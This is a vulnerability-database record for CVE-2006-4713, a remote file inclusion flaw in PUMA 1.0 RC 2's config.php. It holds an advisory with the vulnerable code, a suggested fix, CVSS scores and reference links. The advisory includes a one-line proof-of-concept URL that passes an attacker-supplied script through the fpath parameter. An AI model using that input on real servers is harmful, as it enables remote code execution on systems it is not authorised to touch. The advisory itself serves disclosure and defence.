{"id": "EDB-ID:2340", "type": "exploitdb", "bulletinFamily": "exploit", "title": "PUMA <= 1.0 RC 2 config.php Remote File Include Vulnerability", "description": "PUMA <= 1.0 RC 2 (config.php) Remote File Include Vulnerability. CVE-2006-4713. Webapps exploit for php platform", "published": "2006-09-10T00:00:00", "modified": "2006-09-10T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/2340/", "reporter": "Philipp Niedziela", "references": [], "cvelist": ["CVE-2006-4713"], "lastseen": "2016-01-31T16:02:52", "viewCount": 5, "enchantments": {"score": {"value": 7.5, "vector": "NONE", "modified": "2016-01-31T16:02:52", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2006-4713"]}, {"type": "osvdb", "idList": ["OSVDB:30810"]}], "modified": "2016-01-31T16:02:52", "rev": 2}, "vulnersScore": 7.5}, "sourceHref": "https://www.exploit-db.com/download/2340/", "sourceData": "+--------------------------------------------------------------------\n+\n+ PUMA 1.0 RC 2 (config.php) Remote File Inclusion\n+\n+ Original advisory:\n+ http://www.bb-pcsecurity.de/Websecurity/415/org/PUMA_1.0_RC_2_(config.php)_R FI.htm\n+\n+--------------------------------------------------------------------\n+\n+ Affected Software .: PUMA 1.0 RC 2\n+ Venedor ...........: http://php.psywerx.net/\n+ Class .............: Remote File Inclusion\n+ Risk ..............: high (Remote File Execution)\n+ Found by ..........: Philipp Niedziela\n+ Contact ...........: webmaster[at]bb-pcsecurity[.]de\n+\n+--------------------------------------------------------------------\n+\n+ Affected File:\n+ /config.php\n+\n+ Code:\n+ .....\n+ // Select language\n+ $lang = \"lang_english.php\";\n+ include($fpath.\"./language/$lang\");\n+ .....\n+\n+--------------------------------------------------------------------\n+\n+ $fpath is not properly sanitized before being used\n+\n+--------------------------------------------------------------------\n+\n+ Solution:\n+ -> Declare $fpath!\n+ -> Deny direct access to config.php\n+ -> or modify code:\n+\n+ if(!isset($_REQUEST['fpath']) && !isset($_GET['fpath']) &&\n!isset($_POST['fpath'])){\n+ //code of org. config.php\n+ }\n+ else {\n+ echo \"You cannot access this file directly.\";\n+ die();\n+ }\n+\n+--------------------------------------------------------------------\n+\n+ PoC:\n+\n+ http://[target]/config.php?fpath=[script]\n+\n+--------------------------------------------------------------------\n+\n+ Greets and Thanks: /str0ke\n+\n+-------------------------[ E O F ]----------------------------------\n\n# milw0rm.com [2006-09-10]\n", "osvdbidlist": ["30810"]}

{"cve": [{"lastseen": "2021-02-02T05:27:24", "description": "PHP remote file inclusion vulnerability in config.php in PSYWERKS PUMA 1.0 RC2 allows remote attackers to execute arbitrary PHP code via a URL in the fpath parameter.", "edition": 4, "cvss3": {}, "published": "2006-09-12T16:07:00", "title": "CVE-2006-4713", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-4713"], "modified": "2018-10-17T21:39:00", "cpe": ["cpe:/a:psywerks:puma:1.0_rc2"], "id": "CVE-2006-4713", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-4713", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:psywerks:puma:1.0_rc2:*:*:*:*:*:*:*"]}], "osvdb": [{"lastseen": "2017-04-28T13:20:27", "bulletinFamily": "software", "cvelist": ["CVE-2006-4713"], "description": "# No description provided by the source\n\n## References:\nVendor URL: http://php.psywerx.net/\nOther Advisory URL: http://www.bb-pcsecurity.de/Websecurity/415/org/PUMA_1.0_RC_2_(config.php)_RFI.htm\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-09/0156.html\nISS X-Force ID: 28837\nGeneric Exploit URL: http://www.milw0rm.com/exploits/2340\nFrSIRT Advisory: ADV-2006-3545\n[CVE-2006-4713](https://vulners.com/cve/CVE-2006-4713)\nBugtraq ID: 19940\n", "edition": 1, "modified": "2006-09-10T18:45:34", "published": "2006-09-10T18:45:34", "href": "https://vulners.com/osvdb/OSVDB:30810", "id": "OSVDB:30810", "title": "PUMA config.php fpath Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}